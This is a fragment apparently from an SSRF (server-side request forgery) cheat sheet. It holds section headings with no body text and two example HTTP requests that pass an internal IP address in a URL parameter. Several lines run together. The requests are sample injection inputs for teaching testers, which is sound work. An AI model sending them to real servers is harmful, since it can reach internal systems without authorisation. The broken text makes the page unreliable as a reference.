Server Side Request Forgery (SSRF)
Introduction
Where to find
POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com
urlApi=http://192.168.1.1%2fapi%2f&id=1GET /image?url=http://192.168.1.1/
Host: example.comHow to exploit
How to exploit (URI Scheme)
References
Last updated